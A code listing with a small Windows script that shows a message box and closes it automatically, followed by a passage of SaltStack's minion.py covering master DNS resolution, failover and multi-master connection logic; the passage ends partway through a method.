source | python
|---|---|
testAutoCloseWindow.py
|
import threading, time, ctypes, ctypes.wintypes
WM_CLOSE = 0x0010
MB_OK = 0
# def worker(title, close_until_seconds):
#     time.sleep(close_until_seconds)
#     wd = ctypes.windll.user32.FindWindowA(0, title)
#     ctypes.windll.user32.SendMessageA(wd, WM_CLOSE, 0, 0)
#     return
def find_messagebox(title, threadid, processid):
    # Use the wide-char API so the unicode title created by MessageBoxW matches.
    hwnd = ctypes.windll.user32.FindWindowW(None, title)
    if hwnd:
        p = ctypes.wintypes.DWORD()
        t = ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(p))
        if p.value == processid and t == threadid:
            return hwnd
    return 0
# The callback returns True to keep waiting, False to stop and close the box.
def callbackHandler(abort, threadid, processid, title, callbackDelay, callbackFn):
    # give Windows some time to create the message box
    time.sleep(max(callbackDelay, 0.2))
    while not abort.isSet() and callbackFn():
        time.sleep(callbackDelay)
    hwnd = find_messagebox(title, threadid, processid)
    if not abort.isSet() and hwnd:
        ctypes.windll.user32.PostMessageW(hwnd, WM_CLOSE, 0, 0)
def showWithCallback(text, title, callbackDelay, callbackFn):
    threadid = ctypes.windll.kernel32.GetCurrentThreadId()
    processid = ctypes.windll.kernel32.GetCurrentProcessId()
    abort = threading.Event()
    t = threading.Thread(target=callbackHandler,
                         args=(abort, threadid, processid, title, callbackDelay, callbackFn))
    t.start()
    ctypes.windll.user32.MessageBoxW(0, text, title, MB_OK)
    # Once the box is closed, stop the watcher thread and wait for it to exit.
    abort.set()
    t.join()
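# Illustrative usage (assumed entry point, not part of the original script):
# the watcher thread closes the box once the lambda stops returning True,
# i.e. roughly three seconds after it appears.
if __name__ == '__main__':
    start = time.time()
    showWithCallback(u'This box will close itself shortly.', u'AutoClose demo',
                     0.5, lambda: time.time() - start < 3.0)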
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import re
import sys
import copy
import time
import types
import signal
import random
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.transport.client  # used below for the AsyncPubChannel/AsyncReqChannel factories
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'])
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
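# Illustrative result (assuming a resolvable master and the default port 4506):
# resolve_dns(opts) returns something like
# {'master_ip': '192.0.2.10', 'master_uri': 'tcp://192.0.2.10:4506'},
# plus source_ip/source_ret_port/source_publish_port keys when those options are set.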
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
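# Illustrative behaviour of the parsing above: 'mysaltmaster' yields
# {'master': 'mysaltmaster'}; '127.0.0.1:1234' yields
# {'master': '127.0.0.1', 'master_port': 1234}; and '[::1]:1234' yields
# {'master': '::1', 'master_port': 1234}.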
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedirs would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
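# Illustrative usage (path, mode and ownership are assumptions):
# proc_dir = get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=0, gid=0)
# ensures <cachedir>/proc exists with that mode and owner before job data is written.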
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then it's a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
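# Illustrative behaviour: for a function that accepts **kwargs and
# args == ['web*', {'__kwarg__': True, 'refresh': True}], this returns
# (['web*'], {'refresh': True}), plus '__pub_<key>' entries packed from the
# publish data when a dict is passed in as 'data'.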
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save its result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
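# Illustrative config (module and function names are assumptions): with
# master_type: func and master: my_lookup.get_master in the minion config,
# the loader calls my_lookup.get_master() and replaces opts['master'] with the
# string or list it returns.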
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
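# Illustrative tags produced by the mapping above:
#   master_event(type='connected')                -> '__master_connected'
#   master_event(type='alive', master='master01') -> '__master_alive_master01'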
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minion's initialization
phase (for example from the minion's main event loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
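# Illustrative failover setup (master names are assumptions): with
# master_type: failover and master: ['master-a', 'master-b'], the code below
# tries master-a first and falls back to master-b; a later call with
# failed=True moves the possibly failed master to the end of the list.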
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending on the networking and the set of masters.
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minion's main event loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion doesn't define io_loop, it can't switch masters; see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
else:
mapping = self.opts['discovery'].get('mapping', {})
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
self.opts['master'] = proto_data['master']
return
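# Illustrative discovery match (mapping keys are assumptions): with
# discovery: {'match': 'all', 'mapping': {'role': 'web'}} in the minion config,
# a discovered master is only selected when its advertised mapping also
# carries role: web; with match: any a single matching key is enough.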
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
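# Illustrative behaviour: with return_retry_timer: 5 and return_retry_timer_max: 10
# the timer is a random value between 5 and 10 seconds; if return_retry_timer_max
# is unset or 0, the configured return_retry_timer is returned unchanged.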
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners, etc. The SMinion allows developers to
generate all of the salt minion functions and presents these functions
for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi-minion interface; this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
